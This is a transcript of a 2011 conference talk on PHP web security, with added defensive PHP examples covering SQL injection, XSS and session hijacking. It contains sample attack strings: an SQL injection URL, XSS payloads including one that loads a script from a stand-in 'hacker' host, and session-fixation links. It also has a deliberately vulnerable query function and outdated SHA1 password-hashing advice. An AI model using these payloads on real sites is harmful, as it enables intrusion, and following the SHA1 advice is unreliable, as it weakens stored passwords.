Phpnw security-20111009
Sharing our agency experience of developing secure web applications for some of the UK's leading high street banks and brands, with a focus on the pitfalls you face when developing code in PHP. The talk will contain specific details on the many attack vectors that hackers will use to attempt to access and exploit your site, and how you can improve your development process to avoid them.
Topics covered will include some old chestnuts like XSS (Cross-Site Scripting) and SQL injection, through to issues like Session Hijacking.
The talk is aimed at developers ranging from those who have perhaps not truly considered the security of their applications before to those who would like to extend their knowledge. It is aimed at software developers and will contain practical code-based examples and solutions.

Published in: Technology
Notes for slide
  • Still occurs: in 2011 alone Wikipedia lists 8 real-world examples: Sony; Nokia's Developer Site; NetNames (DNS records and changed entries redirecting users of Betfair (Online Gambling), The Telegraph, The Register, The National Geographic, UPS, Acer, Vodafone.com).
Transcript

    1. Are you feeling secure – notes from the trenches. Paul Lemon, @anthonylime, http://joind.in/3603
    2. Introduction – About me
       - I am a web developer and have been for 13 years
       - Former sound engineer to the obscure and poor
       - Technical Director at MadeByPi
       - I love what I do
       - PHP / Java / Actionscript / Javascript / C#
       - Wear a mean hairnet
    3. "The problem of insecure software is perhaps the most important technical challenge of our time." – OWASP Testing Guide Introduction. Photo courtesy http://www.flickr.com/photos/katescars/
    4. Introduction – This presentation
       - Notes based on personal professional experience
       - Over 20 third-party tests on our applications
       - Development orientated
       - Simple code examples – not production code.
    5. Introduction – OWASP
       - Open Web Application Security Project
       - Best resource for developers / analysts / testers
       - https://www.owasp.org/
    6. Introduction – OWASP Top 10
       - SQL Injection
       - Cross-Site Scripting (XSS)
       - Broken Authentication and Session Management
       - Insecure Direct Object References
       - Cross-Site Request Forgery (CSRF)
       - Security Misconfiguration
       - Insecure Cryptographic Storage
       - Failure to Restrict URL Access
       - Insufficient Transport Layer Protection
       - Unvalidated Redirects and Forwards
    7. Introduction – OWASP Top 10 (same list as slide 6)
    8. SQL Injection. Photo: http://www.flickr.com/photos/andresrueda/2983149263/
    9. Injection – http://xkcd.com/327/
    10. Injection – Sample Code
        http://someserver/script.php?id=1;INSERT INTO members ('email','passwd','login_id','full_name') VALUES ('paul.lemon@gmail.com','hello','paul','Paul Lemon');
    11. Injection – How is it exploited
        - Confidential data can be disclosed
        - The results of the query may not be visible in the HTML
        - Trial and error to iterate data in tables
        - Execute long-running queries
        - Test for errors in page execution
        - Vulnerable to inserts / updates / defacement
    12. Injection – Validation and Parameterised Query (code slide)
    13. Injection – How to prevent
        - Validate all input.
        - Use PDO to create parameterised queries, or
        - Use an ORM or database library (not your own!)
        - Set up your database permissions.
        - Don't expose your queries (logging etc.)
        - Code review
        - Don't be complacent
    14. Injection – A quick note about validation
        - Validation is not just for the user's benefit
        - Cast to the correct type, i.e. intval / floatval / boolean
        - Whitelist input ranges
          - Reasonable minimums and maximums
          - Whitelist with regular expression
          - Blacklist with regular expression
          - Validate email / URLs
          - Don't rely on your model layer
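The following is an added example, not code from the slides or from MadeByPi, showing the `?id=` lookup of slide 10 both the way the deck warns against and the way slides 12 to 14 recommend: validate and cast the input first, then hand it to a PDO prepared statement. The table and column names (`members`, `id`, `email`, `full_name`) and the function names are assumptions for illustration; the in-memory SQLite database at the bottom is constructed sample data so the script runs on its own.

```php
<?php
// Added example (not from the slides): a querystring id looked up two ways.

function findMemberVulnerable(PDO $db, string $rawId): array
{
    // Untrusted input concatenated straight into the SQL text. An id of
    // "1 OR 1=1" changes the WHERE clause and every row comes back.
    $sql = "SELECT id, email, full_name FROM members WHERE id = " . $rawId;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

function findMemberSafe(PDO $db, string $rawId): ?array
{
    // 1. Validate (slide 14): whitelist the shape and range before the value
    //    goes anywhere near the database. filter_var returns false for
    //    anything that is not a plain integer in range, so "1 OR 1=1",
    //    "1;INSERT ..." and "abc" are all rejected rather than "cleaned up".
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Parameterise (slide 13): the value travels separately from the SQL
    //    text, so it cannot alter the statement's structure.
    $stmt = $db->prepare('SELECT id, email, full_name FROM members WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database (assumed schema).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, email TEXT, full_name TEXT)');
$db->exec("INSERT INTO members (email, full_name) VALUES
           ('alice@example.test', 'Alice'), ('bob@example.test', 'Bob')");

// The vulnerable version: one row for a plain id, every row for "1 OR 1=1".
var_dump(count(findMemberVulnerable($db, '1')));
var_dump(count(findMemberVulnerable($db, '1 OR 1=1')));

// The safe version: a single row for a plain id, null for anything else.
var_dump(findMemberSafe($db, '2'));
var_dump(findMemberSafe($db, '1 OR 1=1'));
var_dump(findMemberSafe($db, '1;INSERT INTO members (email) VALUES (\'x\')'));
```

Both halves of the safe function matter: the cast keeps nonsense out of the query entirely (and gives you a clean place to return a 400), while the prepared statement protects you on the day someone adds a string column to the lookup and forgets the validation. On MySQL, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the parameterisation happens server-side rather than by client-side quoting.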
    15. XSS. Photo: http://www.flickr.com/photos/andresrueda/2983149263/
    16. XSS – Sample XSS
        http://someserver/script.php?name=<script>alert();</script> or http://bit.ly/lYMcHjkj
    17. XSS – Sample XSS
        http://host/script.php?name=<script src='http://hacker/script.js' />
    18. XSS – Potential exploits
        - Theft of session cookies
        - Insertion of content / forms etc.
        - Redirection to malicious sites
        - Insertion of trojan downloads / keyloggers etc.
    19. XSS – Varieties of XSS
        - Persistent – data is stored in the database
        - Nonpersistent – injected code is present in the URL/request
        - DOM based – javascript executed in the page reads the request
    20. XSS – Trust zones (diagram). Trusted: web application. Not trusted: browser, which supplies
        - Posted form
        - Querystring
        - Url
        - Cookies
        - HTTP headers
    21. XSS – Trust zones (diagram). Trusted: web application. Not trusted: API
        - Use HTTPS
        - Treat as user input
    22. XSS – Trust zones (diagram). Trusted: web application. Not trusted: database
        - Database may have been compromised
        - Validation may have failed
        - Escape all output
    23. XSS – Trust zones (diagram): API, database, web application, browser
    24. XSS – Trust zones (diagram): API, database, web application, browser. Your application should be modular too.
    25. XSS – Escape all output
        - ENT_QUOTES option is important – double and single quotes
        - Page encoding is important
        - If you need HTML output use HTML Purifier
    26. XSS – Escape all output – context is important (code slide)
    27. XSS – Escape all output – context is important
        ?name=<script>alert("hello");</script>&link=javascript:alert('hello')
    28. XSS – Escape all output – context is important (same example as slide 27)
    29. XSS (code slide)
    30. XSS – Preventing XSS
        - Check your templating engine for XSS protection (options in Symfony 1 / Twig for escaping by default)
        - Context is important to the escaping used
          - Image and hyperlinks
          - Javascript blocks
          - CSS
        - There is not a definitive solution for PHP
        - https://www.owasp.org/index.php/ESAPI#tab=PHP
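An added example, not from the slides, of the point made on slides 25 to 30: the escaping has to match the context the value lands in. It takes the two parameters from slide 27, `name` and `link`, and renders them into an HTML body, an `href` and a `<script>` block. The helper names (`e`, `safeUrl`, `js`) and the scheme whitelist are my own choices; the inputs at the bottom are constructed to mirror the slide.

```php
<?php
// Added example (not from the slides): one escaper per output context.

// HTML body and attribute context (slide 25): ENT_QUOTES so both quote styles
// are neutralised, and an explicit charset because the page encoding matters.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// URL context: escaping alone cannot help, because javascript:alert('hello')
// contains nothing htmlspecialchars would touch. Whitelist the scheme instead
// and fall back to a harmless value for anything else.
function safeUrl(string $url): string
{
    // Browsers ignore control characters and whitespace inside a scheme, so
    // strip them before parsing rather than letting "java\tscript:" through.
    $url = preg_replace('/[\x00-\x20\x7f]+/', '', $url);
    $parts = parse_url($url);
    if ($parts === false) {
        return '#';
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    // Relative URLs (no scheme) are fine; absolute ones must use an allowed scheme.
    if ($scheme !== '' && !in_array($scheme, ['http', 'https', 'mailto'], true)) {
        return '#';
    }
    return e($url); // still HTML-escape it for the attribute it is placed in
}

// JavaScript context (slide 30): emit the value as a JSON literal with the
// HTML-significant characters hex-encoded, so a "</script>" inside the data
// cannot terminate the block it sits in.
function js(string $value): string
{
    return json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Constructed inputs mirroring slide 27.
$name = '<script>alert("hello");</script>';
$link = "javascript:alert('hello')";

echo '<p>Hello ' . e($name) . "</p>\n";                                  // tags rendered as text
echo '<a href="' . safeUrl($link) . '">profile</a>' . "\n";               // href becomes "#"
echo '<a href="' . safeUrl('https://example.test/?q=a&b=2') . '">ok</a>' . "\n"; // allowed, & escaped
echo '<a href="' . safeUrl("\tjavascript:alert(1)") . '">tab</a>' . "\n"; // still "#"
echo '<script>var visitor = ' . js($name) . ";</script>\n";             // safe JS string literal
```

The three functions deliberately do different things: `e()` encodes, `safeUrl()` validates and then encodes, and `js()` serialises. Using `e()` for all three is the mistake slide 27 is about, since the `link` value passes through it unchanged.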
    31. XSS – Cookies set as HttpOnly
        - Set the session cookie to HttpOnly in php.ini
        - Or use the PHP function session_set_cookie_params
    32. Session Exploits
    33. Session Exploits – Overview
        - Session Fixation
        - Man in the middle attacks
    34. Session Exploits – Session Fixation
        - Allowing the session id to be passed on the querystring
        - Url is sent via email to potential victim
        - "visit this url to the site" http://localhost/?sessionid=1234
        - Victim logs in and this is attached to the session id
        - Sender uses the original session id and gains access
        - http://localhost/viewprofile?sessionid=1234
    35. Session Exploits – Session Fixation – How to prevent
        - Do not allow the session id to be passed on the querystring
    36. Session Exploits – Session Fixation, where the attacker has access to the machine
        - First user notes down the session id on the computer
        - Second user logs in and this is attached to the session id
        - First user uses the original session id and gains access
    37. Session Exploits – Session Fixation – How to prevent
        - Roll the session id when a user logs in
        - You can change the session id more frequently…
    38. Session Exploits – Man in the middle attacks (diagram): user logs in… HTTP POST of username / password to the web application; session id returned as a cookie
    39. Session Exploits – Man in the middle attacks (diagram): as slide 38, with the attacker reading the HTTP POST ("Ahoy!")
    40. Session Exploits – Man in the middle attacks (diagram): user logs in… HTTPS POST of username / password to the web application; session id returned as a cookie
    41. Session Exploits – Man in the middle attacks
        - Login and authentication must always be over HTTPS
        - Passwords are personal and confidential
        - Users are not disciplined
        - (Store your passwords securely SHA1 / Salt)
    42. Session Exploits – Man in the middle attacks (diagram): user logs in over HTTPS POST and receives the session id cookie; user then visits a non-secure page over HTTP GET, the session id cookie is sent with it and the resource is downloaded
    43. Session Exploits – Man in the middle attacks (diagram, same as slide 42)
    44. Session Exploits – Man in the middle attacks
        - Authenticated session cookies should be delivered over SSL
        - Use the HTTPS-only option on the session cookie
        - Use a separate domain if you can, e.g. https://admin.yoursite/
        - Use a separate path for your session cookie
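The following is an added example, not the speaker's code, that puts the session recommendations from slides 31, 35, 37 and 44 into one bootstrap: no session id from the querystring, HttpOnly and Secure flags on the cookie, a narrow cookie path, and a session id that is rolled at login and again on a timer. The cookie name `SID`, the `/admin/` path and the rotation interval are assumptions; `session_set_cookie_params` with an options array needs PHP 7.3 or later.

```php
<?php
// Added example (not from the slides): session cookie and id handling in one place.
declare(strict_types=1);

function bootstrapSession(bool $httpsOnly): void
{
    // Slide 35: never accept the session id from the querystring. With
    // use_only_cookies on, ?SID=1234 is ignored, and use_trans_sid off stops
    // PHP appending the id to links. Equivalent php.ini keys have the same names.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    // Reject ids the client made up instead of starting a new session under
    // them; an attacker-chosen id is exactly what fixation relies on.
    ini_set('session.use_strict_mode', '1');

    // Slides 31 and 44: HttpOnly keeps the cookie out of document.cookie
    // (php.ini: session.cookie_httponly = 1), Secure keeps it off plain HTTP,
    // and a narrow path limits which requests carry it at all.
    session_set_cookie_params([
        'lifetime' => 0,             // session cookie, discarded when the browser closes
        'path'     => '/admin/',     // assumption: the authenticated area of the site
        'domain'   => '',            // current host only (slide 44: or a separate admin domain)
        'secure'   => $httpsOnly,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_name('SID');             // assumed cookie name
    session_start();
}

// Slide 37: roll the session id on login so whatever id the browser held
// before authentication (fixed by an attacker or noted down on a shared
// machine, slide 36) is useless afterwards.
function loginUser(int $userId): void
{
    session_regenerate_id(true);     // true: delete the old session data too
    $_SESSION['user_id'] = $userId;
    $_SESSION['rolled_at'] = time();
}

// Slide 37: "you can change the session id more frequently". Assumed interval.
function rotateIfStale(int $maxAgeSeconds = 900): void
{
    if (isset($_SESSION['rolled_at']) && time() - $_SESSION['rolled_at'] > $maxAgeSeconds) {
        session_regenerate_id(true);
        $_SESSION['rolled_at'] = time();
    }
}

// Clear server state and expire the cookie with the same parameters it was set with.
function logoutUser(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    setcookie(session_name(), '', time() - 3600, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    session_destroy();
}

// Typical use: run at the top of every request in the authenticated area.
$isHttps = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off';
bootstrapSession($isHttps);
rotateIfStale();
```

The `secure` flag is what turns slide 42's leak into slide 47's "Curses!": once it is set, the browser never attaches the cookie to an `http://` request, so a resource fetched from a non-secure page travels without it. If the application genuinely has to keep a session on plain HTTP as well, that is the two-cookie case on slides 49 to 51.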
    45. Session Exploits – Man in the middle attacks (diagram)
    46. Session Exploits – Man in the middle attacks (diagram)
    47. Session Exploits – Man in the middle attacks (diagram): user logs in over HTTPS POST and receives the session id cookie; user visits a non-secure page over HTTP GET and the resource is downloaded without the session id cookie
    48. Session Exploits – Man in the middle attacks (diagram, same as slide 47; the eavesdropper on the HTTP GET now sees no cookie: "Curses!")
    49. Session Exploits – Man in the middle attacks
        - Sometimes you cannot limit the session to HTTPS
        - Users can log in and see non-secure data in public pages
        - There are still secure areas of the site
        - Use two cookies
        - Or make the user log in again
    50. Session Exploits (diagram) – Open zone of the web application: user logs in… HTTPS POST of username / password; response sets the session id cookie and an extra auth cookie marked SECURE. User visits a non-secure page over HTTP GET; only the session id cookie is sent and the resource is downloaded
    51. Session Exploits (diagram) – Secure zone of the web application: user logs in… HTTPS POST of username / password; response sets the session id cookie and an extra auth cookie marked SECURE. User visits a secure page over HTTPS GET/POST/PUT; both the session id and the extra auth cookie are sent and the response is returned
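An added example, not from the slides, of the two-cookie pattern on slides 49 to 51. The ordinary session cookie keeps working on the public pages over plain HTTP; the login handler, which runs over HTTPS, issues a second cookie with the Secure flag, and every request in the secure zone must present it. The cookie name `EXTRA_AUTH`, the token length and the way the token is bound to the session (a hash stored in `$_SESSION`) are my own choices; `setcookie` with an options array needs PHP 7.3 or later.

```php
<?php
// Added example (not from the slides): a Secure-only second cookie for the secure zone.
declare(strict_types=1);

const EXTRA_AUTH_COOKIE = 'EXTRA_AUTH'; // assumed cookie name

// Called from the HTTPS login handler once the password check has passed
// (and after the session id has been regenerated, slide 37).
function issueExtraAuthCookie(): void
{
    $token = bin2hex(random_bytes(32));
    // Store only a hash server-side so a copied session file does not
    // hand out usable tokens.
    $_SESSION['extra_auth_hash'] = hash('sha256', $token);
    setcookie(EXTRA_AUTH_COOKIE, $token, [
        'expires'  => 0,
        'path'     => '/',
        'secure'   => true,   // never sent over plain HTTP, so the eavesdropper on slide 48 never sees it
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// The check every secure-zone request runs. Pure function of the superglobals
// so it can be exercised without a real request.
function secureZoneAuthenticated(array $server, array $cookie, array $session): bool
{
    $isHttps = isset($server['HTTPS']) && $server['HTTPS'] !== 'off';
    if (!$isHttps || empty($session['user_id']) || empty($session['extra_auth_hash'])) {
        return false;
    }
    $presented = $cookie[EXTRA_AUTH_COOKIE] ?? '';
    if (!is_string($presented) || $presented === '') {
        return false;
    }
    // The cookie is a credential: compare in constant time.
    return hash_equals($session['extra_auth_hash'], hash('sha256', $presented));
}

// Secure-zone pages call this first. A session that is valid for the open zone
// but lacks the Secure cookie is sent back to log in (slide 49: "or make the
// user log in again"); the session itself is left intact for the public pages.
function requireSecureZone(): void
{
    if (!secureZoneAuthenticated($_SERVER, $_COOKIE, $_SESSION)) {
        header('Location: /login', true, 302);
        exit;
    }
}

// Constructed walk-through of the guard without a web server.
$session = ['user_id' => 7, 'extra_auth_hash' => hash('sha256', 'constructed-token')];
var_dump(secureZoneAuthenticated(['HTTPS' => 'on'], [EXTRA_AUTH_COOKIE => 'constructed-token'], $session)); // true
var_dump(secureZoneAuthenticated(['HTTPS' => 'on'], [], $session));                                          // false: no second cookie
var_dump(secureZoneAuthenticated([], [EXTRA_AUTH_COOKIE => 'constructed-token'], $session));                  // false: not HTTPS
var_dump(secureZoneAuthenticated(['HTTPS' => 'on'], [EXTRA_AUTH_COOKIE => 'wrong'], $session));               // false: token mismatch
```

The session cookie on its own is now worth only what the open zone exposes; anything in the secure zone needs the token that has never crossed the wire unencrypted. Binding the token to the session via the stored hash means a captured session id cannot be "upgraded" by presenting a token minted for some other session.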
    52. XSRF
    53. XSRF – Sorry, no time
    54. Conclusions
    55. Conclusions – Get someone else to do the work
    56. Conclusions – Get someone else to do the work
        - Use a framework. I like symfony.
        - Use a well supported platform / CMS
        - Check their response to security issues
        - If there is no solution – check again (and again)
    57. Conclusions – Recommendations
        - Expect there to be faults – test as much as you can.
        - Expect there to be attacks – monitor your site
        - Stay on top of your versions – PHP / MySQL etc.
        - Input validation is critical
        - Code for quality / unit tests / regression
        - Code review
        - Operate with least privilege
        - Establish a build and deployment script
        - Read OWASP
    58. Conclusions – Resources
        - XSS cheatlist: http://ha.ckers.org/xss.html
        - OWASP: https://www.owasp.org/index.php/Main_Page
        - HTML Purifier: http://htmlpurifier.org/
        - Context aware templates: http://googleonlinesecurity.blogspot.com/2009/03/reducing-xss-by-way-of-automatic.html
        - MadeByPi: http://www.madebypi.co.uk
    59. Are you feeling secure – notes from the trenches. Paul Lemon, @anthonylime – paul.lemon@gmail.com, http://joind.in/3603